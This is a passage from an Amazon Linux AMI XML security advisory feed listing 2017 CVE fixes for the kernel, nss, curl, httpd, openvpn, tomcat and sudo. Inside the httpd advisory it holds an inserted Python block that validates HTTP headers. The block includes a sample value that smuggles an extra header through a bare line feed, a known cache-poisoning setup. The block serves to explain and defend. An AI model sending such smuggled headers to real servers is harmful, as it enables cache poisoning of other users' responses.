epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.27-14.33.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-846</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-846: medium priority package update for kernel</title><issued date="2017-06-22 19:10:00" /><updated date="2017-06-22 22:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9242:
The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel through 4.11.3 is too late in checking whether an overwrite of an skb data structure may occur, which allows local users to cause a denial of service (system crash) via crafted system calls.
1456388:
CVE-2017-9242 kernel: Incorrect overwrite check in __ip6_append_data()
CVE-2017-9077:
The tcp_v6_syn_recv_sock function in net/ipv6/tcp_ipv6.c in the Linux kernel mishandles inheritance, which allows local users to cause a denial of service or possibly have unspecified other impact via crafted system calls, a related issue to CVE-2017-8890. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1452744:
CVE-2017-9077 kernel: net: tcp_v6_syn_recv_sock function mishandles inheritance
CVE-2017-9076:
The IPv6 DCCP implementation in the Linux kernel mishandles inheritance, which allows local users to cause a denial of service or possibly have unspecified other impact via crafted system calls, a related issue to CVE-2017-8890. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1452688:
CVE-2017-9076 kernel: net: IPv6 DCCP implementation mishandles inheritance
CVE-2017-9075:
The sctp_v6_create_accept_sk function in net/sctp/ipv6.c in the Linux kernel mishandles inheritance, which allows local users to cause a denial of service or possibly have unspecified other impact via crafted system calls, a related issue to CVE-2017-8890. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1452691:
CVE-2017-9075 kernel: net: sctp_v6_create_accept_sk function mishandles inheritance
CVE-2017-9074:
The IPv6 fragmentation implementation in the Linux kernel does not consider that the nexthdr field may be associated with an invalid option, which allows local users to cause a denial of service (out-of-bounds read and BUG) or possibly have unspecified other impact via crafted socket and send system calls. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1452679:
CVE-2017-9074 kernel: net: IPv6 fragmentation implementation does not consider that the nexthdr field may be associated with an invalid option
CVE-2017-9059:
The NFSv4 implementation in the Linux kernel through 4.11.1 allows local users to cause a denial of service (resource consumption) by leveraging improper channel callback shutdown when unmounting an NFSv4 filesystem, aka a &quot;module reference and kernel daemon&quot; leak.
1451386:
CVE-2017-9059 kernel: Module reference leak due to improper shut down of callback channel on umount
CVE-2017-8890:
The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel allows attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1450972:
CVE-2017-8890 kernel: Double free in the inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8890" title="" id="CVE-2017-8890" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9059" title="" id="CVE-2017-9059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9074" title="" id="CVE-2017-9074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9075" title="" id="CVE-2017-9075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9076" title="" id="CVE-2017-9076" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9077" title="" id="CVE-2017-9077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9242" title="" id="CVE-2017-9242" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.32" release="15.41.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.32" release="15.41.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.32-15.41.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-847</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-847: medium priority package update for lynis</title><issued date="2017-06-22 19:19:00" /><updated date="2017-06-22 23:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8108:
Unspecified tests in Lynis before 2.5.0 allow local users to write to arbitrary files or possibly gain privileges via a symlink attack on a temporary file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8108" title="" id="CVE-2017-8108" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lynis" version="2.5.0" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/lynis-2.5.0-1.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-848</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-848: important priority package update for nss</title><issued date="2017-06-22 19:20:00" /><updated date="2017-06-22 22:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7502:
A null pointer dereference flaw was found in the way NSS handled empty SSLv2 messages. An attacker could use this flaw to crash a server application compiled against the NSS library.
1446631:
CVE-2017-7502 nss: Null pointer dereference when handling empty SSLv2 messages
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7502" title="" id="CVE-2017-7502" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-debuginfo" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.28.4-1.2.79.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.28.4-1.2.79.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.28.4-1.2.79.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.28.4-1.2.79.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.28.4" 
release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.28.4-1.2.79.amzn1.i686.rpm</filename></package><package name="nss" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.28.4-1.2.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-849</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-849: important priority package update for puppet3</title><issued date="2017-06-22 19:23:00" /><updated date="2017-06-22 22:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-2295:
1452651:
CVE-2017-2295 puppet: Unsafe YAML deserialization
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2295" title="" id="CVE-2017-2295" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet3" version="3.7.4" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/puppet3-3.7.4-1.13.amzn1.noarch.rpm</filename></package><package name="puppet3-server" version="3.7.4" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/puppet3-server-3.7.4-1.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-850</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-850: low priority package update for curl</title><issued date="2017-06-22 19:24:00" /><updated date="2017-06-22 23:03:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7407:
The ourWriteOut function in tool_writeout.c in curl 7.53.1 might allow physically proximate attackers to obtain sensitive information from process memory in opportunistic circumstances by reading a workstation screen during use of a --write-out argument ending in a &#039;%&#039; character, which leads to a heap-based buffer over-read.
1439190:
CVE-2017-7407 curl: --write-out out of bounds read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7407" title="" id="CVE-2017-7407" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.51.0" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.51.0-6.74.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.51.0" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.51.0-6.74.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.51.0" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.51.0-6.74.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.51.0" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.51.0-6.74.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.51.0" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.51.0-6.74.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.51.0" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.51.0-6.74.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.51.0" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.51.0-6.74.amzn1.i686.rpm</filename></package><package name="curl" version="7.51.0" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.51.0-6.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-851</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-851: medium priority package update for httpd</title><issued date="2017-06-22 19:25:00" /><updated date="2017-06-22 22:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix 
the following vulnerabilities:
CVE-2016-8743:
It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning.
1406822:
CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects
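The parsing disagreement the advisory describes, as an added example that is not from the page or from httpd: a strict header-line validator (Python) applying the RFC 7230 rules that a front end and a back end must agree on (no whitespace between the field-name and the colon, only token characters in the name, no control characters in the value), next to a deliberately tolerant parser that accepts a bare LF as a line end. The sample header blocks are constructed.

```python
import string

# RFC 7230 "tchar": characters allowed in a header field-name. chr(38) is the ampersand.
TCHAR = set(string.ascii_letters + string.digits + "!#$%'*+-.^_`|~" + chr(38))


def validate_header_line(line):
    """Return None if `line` (one header line without its CRLF) is a well-formed RFC 7230
    header field, otherwise a short rejection reason."""
    name, sep, value = line.partition(":")
    if not sep:
        return "missing colon"
    if not name:
        return "empty field-name"
    if name != name.rstrip(" \t"):
        # RFC 7230 section 3.2.4: a server MUST reject this with 400.
        return "whitespace between field-name and colon"
    bad = [c for c in name if c not in TCHAR]
    if bad:
        # Also catches obs-fold continuation lines (leading SP/HTAB), which a server may reject.
        return "illegal character in field-name: %r" % bad[0]
    for c in value:
        o = ord(c)
        if o == 127 or (o != 9 and o in range(32)):
            # Bare CR, bare LF, NUL and the other C0 controls never belong in a field-value.
            return "control character in field-value: %r" % c
    return None


def strict_parse(raw):
    """Split a raw header block on CRLF only and validate every line.
    Returns (headers, None) or (None, reason) for the first rejected line."""
    headers = {}
    for line in raw.split("\r\n"):
        if line == "":
            continue
        reason = validate_header_line(line)
        if reason is not None:
            return None, reason
        name, _, value = line.partition(":")
        headers[name.lower()] = value.strip(" \t")
    return headers, None


def lenient_parse(raw):
    """What a tolerant hop does: bare LF ends a line and space before the colon is dropped.
    Included only to show where two hops disagree; not something to deploy."""
    headers = {}
    for line in raw.replace("\r\n", "\n").split("\n"):
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


# Constructed samples.
SAMPLE_GOOD = "Host: example.test\r\nX-Forwarded-For: 10.0.0.1\r\n"
SAMPLE_SPACE_BEFORE_COLON = "Host : example.test\r\n"
# One line to the strict parser (bare LF is a control character), two headers to the lenient one.
SAMPLE_BARE_LF = "X-Foo: a\nX-Cache-Key: attacker-chosen\r\n"

if __name__ == "__main__":
    for sample in (SAMPLE_GOOD, SAMPLE_SPACE_BEFORE_COLON, SAMPLE_BARE_LF):
        print(repr(sample), "strict:", strict_parse(sample), "lenient:", lenient_parse(sample))
```

The last sample is the shape of the problem: the strict hop sees one malformed header and refuses the request, while the lenient hop sees a second header it was never meant to receive. When the lenient side is the one choosing the cache key, that is the poisoning setup.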
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8743" title="" id="CVE-2016-8743" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-devel" version="2.2.32" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.32-1.9.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.32" release="1.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.32-1.9.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.32" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.32-1.9.amzn1.noarch.rpm</filename></package><package name="httpd-tools" version="2.2.32" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.32-1.9.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.32" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.32-1.9.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.32" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.32-1.9.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.32" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.32-1.9.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.32" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.32-1.9.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.32" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.32-1.9.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.32" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.32-1.9.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.32" release="1.9.amzn1" epoch="1" 
arch="i686"><filename>Packages/mod_ssl-2.2.32-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-852</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-852: important priority package update for openvpn</title><issued date="2017-06-27 17:47:00" /><updated date="2017-07-06 22:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7522:
OpenVPN versions before 2.4.3 and before 2.3.17 are vulnerable to denial-of-service by an authenticated remote attacker who sends a certificate with an embedded NULL character.
1463642:
CVE-2017-7508 CVE-2017-7520 CVE-2017-7521 CVE-2017-7522 openvpn: Multiple security issues fixed in OpenVPN 2.4.3 and 2.3.17
CVE-2017-7521:
OpenVPN versions before 2.4.3 and before 2.3.17 are vulnerable to remote denial-of-service through memory exhaustion, caused by memory leaks and a double-free issue in extract_x509_extension().
1463642:
CVE-2017-7508 CVE-2017-7520 CVE-2017-7521 CVE-2017-7522 openvpn: Multiple security issues fixed in OpenVPN 2.4.3 and 2.3.17
CVE-2017-7520:
OpenVPN versions before 2.4.3 and before 2.3.17 are vulnerable to denial-of-service and/or possibly a sensitive memory leak triggered by a man-in-the-middle attacker.
1463642:
CVE-2017-7508 CVE-2017-7520 CVE-2017-7521 CVE-2017-7522 openvpn: Multiple security issues fixed in OpenVPN 2.4.3 and 2.3.17
CVE-2017-7508:
OpenVPN versions before 2.4.3 and before 2.3.17 are vulnerable to remote denial-of-service when receiving a malformed IPv6 packet.
1463642:
CVE-2017-7508 CVE-2017-7520 CVE-2017-7521 CVE-2017-7522 openvpn: Multiple security issues fixed in OpenVPN 2.4.3 and 2.3.17
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7508" title="" id="CVE-2017-7508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7520" title="" id="CVE-2017-7520" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7521" title="" id="CVE-2017-7521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7522" title="" id="CVE-2017-7522" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn" version="2.4.3" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.4.3-1.19.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.3" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.4.3-1.19.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.3" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-devel-2.4.3-1.19.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.3" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-devel-2.4.3-1.19.amzn1.i686.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.3" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.4.3-1.19.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.4.3" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.4.3-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-853</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-853: important priority package update for tomcat7</title><issued date="2017-07-06 17:24:00" /><updated date="2017-07-06 22:52:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5664:
A vulnerability was discovered in the error page mechanism in Tomcat&#039;s DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page.
1459158:
CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5664" title="" id="CVE-2017-5664" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-webapps" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.78" release="1.27.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.78-1.27.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-854</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-854: important priority package update for tomcat8</title><issued date="2017-07-06 17:25:00" /><updated date="2017-07-06 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5664:
A vulnerability was discovered in the error page mechanism in Tomcat&#039;s DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page.
1459158:
CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5664" title="" id="CVE-2017-5664" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.44" release="1.71.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.44-1.71.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.44" release="1.71.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-lib-8.0.44-1.71.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-855</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-855: medium priority package update for sudo</title><issued date="2017-07-06 19:03:00" /><updated date="2017-07-06 22:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000368:
* It was found that the original fix for CVE-2017-1000367 was incomplete. A flaw was found in the way sudo parsed tty information from the process status file in the proc filesystem. A local user with privileges to execute commands via sudo could use this flaw to escalate their privileges to root.
